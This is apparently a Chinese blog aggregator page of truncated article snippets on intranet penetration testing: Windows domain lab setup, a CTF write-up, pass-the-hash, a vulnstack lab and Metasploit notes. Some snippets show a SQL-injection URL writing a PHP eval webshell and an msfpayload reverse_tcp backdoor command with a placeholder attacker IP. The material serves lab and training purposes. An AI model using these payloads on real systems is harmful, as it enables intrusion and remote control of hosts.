首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
【
内网渗透----域环境搭建(server 2008)
】的更多相关文章
内网渗透----域环境搭建(server 2012)
先确定两台服务器相通 1.配置静态IP与DNS 2.配置域服务 点击服务器管理器-添加角色和功能-下一步-添加AD域服务: 3.提升为域控制器 安装完成后,可在旗帜处选择提升为域控制器 添加新林 添加密码 需要重启 重启之后可以进行安装,且安装完成后自动重启,重启后域环境已经配置好 4.配置域成员 将DNS指向域控 加入域 又需要重启... 使用域控的账户登录,虚拟环境问题 运行修复 重新配置DNS 终于成功 重启again 重启后可登录至域 5.降域 域控制器中输入dsa.msc 在域控制中将…
内网渗透----域环境搭建(server 2008)
域控制器 配置静态IP 安装域服务 点击服务器管理器-添加角色-下一步-添加AD域服务: 安装过后运行安装向导: 下一步后选择"在新林中新建域": 若提示密码不符合要求,则配置密码后再下一步: 设置域名称: 根据需求,选择林功能级别: 建立DNS服务: 默认选择后再次设置密码: 重启后安装成功. 添加域用户 在域管理中新建用户: 设置姓名.登录名: 设置密码: 设置域成员 域成员机器需要将DNS指向域控服务器: 在计算机属性中更改"计算机名称.域和工作组设置": 选…
【CTF】msf和impacket联合拿域控内网渗透-拿域控
前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>&…
内网 Ubuntu 20.04 搭建 docusaurus 项目(或前端项目)的环境(mobaxterm、tigervnc、nfs、node)
内网 Ubuntu 20.04 搭建 docusaurus 项目(或前端项目)的环境 背景 内网开发机是 win7,只能安装 node 14 以下,而 spug 的文档项目采用的是 Facebook 的 docusaurus,需要 node 14 以上才能构建.打包,所以决定借助另一台 ubuntu 20.04 的机器来对这个文档项目进行二次开发. Tip:这里 docusaurus 指的是 spug 开源项目的官方文档项目.前些天发现该官网仓库已找不到了. 远程工具 借助远程工具,即通过 wi…
5.内网渗透之PTH&PTT&PTK
---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-the-hash) pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码. pass the hash原理: 在Windows系统中,通常会使用NTLM身份认证 NTLM认证不使用明文口令,而是使用口令加…
内网渗透之vlunstack靶场
前言:vlunstack靶场是由三台虚拟机构成,一台是有外网ip的windows7系统(nat模式),另外两台是纯内网机器(外网ping不通),分别是域控win2008和内网主机win2003,这里就不演示搭建了 靶场:vlunstack 攻击机:kali 其他工具:御剑爆破工具,ladon,蚁剑 1.对网页进行渗透,获取webshell 这里网页已经给了后台的账号密码,所以可以直接进入后台 进入后台通过模板编辑写入一句话木马 利用御剑爆破扫描工具爆破出你写入了一句话代码的网页所在目录 2.用蚁…
[原创]K8 cping 3.0大型内网渗透扫描工具
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但Cscan不需要编程同样可实现自定义功能,这比单纯插件化更容易实现插件功能Cscan旨在为用户提供一个高度灵活.简单易用.多线程.多网段的插件化扫描框架,减少大量重复性工作提高工作效率3.3及以上版本分为检测存活和不检测存活主机模式 程序采用多线程批量扫描大型内网IP段C段存活主机(支持上万个C段)插…
metasploit渗透测试笔记(内网渗透篇)
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…
Metasploit 内网渗透篇
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPO…
7.内网渗透之windows认证机制
文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域渗透中,横向移动最重要是对windows认证协议的理解 首先介绍一下windows密码的Hash: 早期SMB协议在网络上传输明文口令,后来出现"LAN Manager Challenge/Response"验证机制,简称LM,由于容易被破解,微软提出了windows NT挑战/响应机制,…